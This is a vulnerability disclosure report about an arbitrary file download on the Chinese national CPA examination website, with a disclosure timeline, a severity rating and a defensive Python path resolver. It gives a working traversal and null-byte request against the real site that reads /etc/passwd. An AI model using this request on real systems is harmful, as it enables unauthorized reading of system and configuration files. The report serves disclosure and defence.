2014-12-28: Details reported to the vendor; awaiting vendor handling.
2014-12-31: Vendor confirmed; details disclosed to the vendor only.
2015-01-10: Details disclosed to core white hats and experts in the relevant field.
2015-01-20: Details disclosed to regular white hats.
2015-01-30: Details disclosed to intern white hats.
2015-02-11: Details disclosed to the public.
Arbitrary file download on the National Certified Public Accountant Examination website
Arbitrary file download:
http://cpaexam.cicpa.org.cn/ArticleMngAction.do?filePath=/../../../etc/passwd%00.jpg&method=downFile
/etc/passwd: [contents retrieved; dump omitted]
Further files were retrieved the same way (dumps omitted): they identify the host as Red Hat Enterprise Linux Server release 6.5 (Santiago) and include hostnames, internal addresses, login session records and the system ssh_config.
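The request above combines two classic weaknesses: `../` segments in `filePath` are passed straight into a filesystem path, and the `%00` null byte truncates the path so that a `.jpg` suffix check passes while the actual read ends at `/etc/passwd`. The following added example (not code from the original report or from the affected site) shows a download-path resolver that defeats both: it refuses embedded NUL bytes, resolves the request against a fixed base directory, confirms the real path still lies inside it, and only then checks the suffix on the canonical path. The base directory and file names are constructed for the demonstration.

```python
import tempfile
from pathlib import Path


def resolve_download(base_dir: Path, requested: str,
                     allowed_suffixes=(".jpg", ".pdf")) -> Path:
    """Map a user-supplied filePath onto a file strictly inside base_dir.

    Rejects NUL bytes (the %00 trick), resolved paths outside base_dir
    (../ traversal, symlinks) and suffixes not on the allow-list.
    """
    if "\x00" in requested:
        raise ValueError("NUL byte in path")
    base = Path(base_dir).resolve()
    # Drop leading separators so an absolute path cannot bypass the join.
    candidate = (base / requested.lstrip("/\\")).resolve()
    # Compare real (symlink-free) paths: base must be an ancestor.
    if base not in candidate.parents:
        raise ValueError("path escapes download directory")
    # Suffix is checked on the canonical path, after any truncation trick.
    if candidate.suffix.lower() not in allowed_suffixes:
        raise ValueError("suffix not allowed")
    if not candidate.is_file():
        raise ValueError("not a regular file")
    return candidate


def demo() -> dict:
    """Run the resolver over constructed requests; return each verdict."""
    with tempfile.TemporaryDirectory() as tmp:
        files = Path(tmp) / "files"          # hypothetical download root
        files.mkdir()
        (files / "notice.pdf").write_bytes(b"%PDF-constructed sample")
        (files / "config.ini").write_text("constructed sample")
        cases = {
            "ok": "notice.pdf",
            "traversal": "/../../../etc/passwd",
            "null_byte": "/../secret.txt\x00.jpg",   # %00.jpg once decoded
            "bad_suffix": "config.ini",
        }
        verdicts = {}
        for name, req in cases.items():
            try:
                resolve_download(files, req)
                verdicts[name] = "allowed"
            except ValueError as exc:
                verdicts[name] = f"rejected: {exc}"
        return verdicts
```

Only the legitimate request is allowed; the traversal, null-byte and wrong-suffix requests are each rejected by a different check, which is the behaviour the vulnerable handler lacked.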
Severity: Medium
Vulnerability rank: 8
Confirmed: 2014-12-31 17:16
CNVD confirmed and reproduced the described situation and has notified the organization administering the website through the contact details published on the site.
None yet